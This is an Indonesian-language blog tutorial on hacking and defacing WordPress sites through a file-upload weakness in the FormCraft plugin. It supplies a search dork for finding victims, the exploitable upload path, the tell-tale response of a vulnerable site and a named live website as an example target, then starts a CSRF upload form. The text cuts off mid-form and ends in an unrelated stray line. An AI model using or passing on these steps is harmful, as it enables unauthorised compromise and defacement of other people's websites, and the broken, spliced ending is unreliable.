Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0 - Sesuai dengan judul postingan, kali ini saya akan memberikan tutorial untuk melakukan hacking atau deface sebuah website. Target kita kali ini adalah situs yang menggunakan CMS WordPress, dan kita akan memanfaatkan kelamahan dari plugin FromCraft yang terinstall di situs target. Dork : inurl:"/wp-content/plugins/formcraft/" Exploit : /wp-content/plugins/formcraft/file-upload/server/content/upload.php Target yang vuln akan memunculkan tulisan seperi ini : {"failed":"No file found 2"} Silahkan dorking dulu untuk mencari target. Dork bisa kalian kembangkan sendiri biar lebih mantap. Berikut ini adalah salah satu contoh target yang vuln. http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php Setelah mendapatkan target yang vuln, selanjutnya kita akan menggunakan CSRF untuk mengupload file kita. ***CSRF*** <form method="POST" action="[Alamat_Ta
my memories are right here